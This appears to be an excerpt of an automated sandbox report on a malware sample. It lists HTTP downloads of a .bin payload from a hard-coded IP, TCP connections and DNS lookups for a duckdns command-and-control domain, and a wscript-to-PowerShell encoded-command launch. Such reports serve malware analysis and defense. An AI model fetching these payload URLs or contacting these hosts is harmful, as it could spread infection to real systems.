Source: global traffic; HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.167.84.150 | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.167.84.150 | Cache-Control: no-cache
Source: global traffic; TCP traffic: 192.168.11.20:49806 -> 193.104.197.85:6577
Source: unknown; TCP traffic detected without corresponding DNS query: 103.167.84.150 (50 identical entries)
Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp; String found in binary or memory: http://103.167.84.150/bconta/Host_DwUbTLydN243.bin
Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16196062237.0000000002EB9000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16335676506.0000000003298000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin
Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)
Source: ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-
Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binE
Source: ieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binO
Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.s
Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;
Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bind
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp; String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bins
Source: powershell.exe, 0000000E.00000002.16332582350.0000000000C38000.00000004.00000001.sdmp; String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmp; String found in binary or memory: https://aka.ms/pscore6lBpm
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown; DNS traffic detected: queries for: septnet.duckdns.org
Source: global traffic; HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.167.84.150 | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.167.84.150 | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.167.84.150 | Cache-Control: no-cache

System Summary:

Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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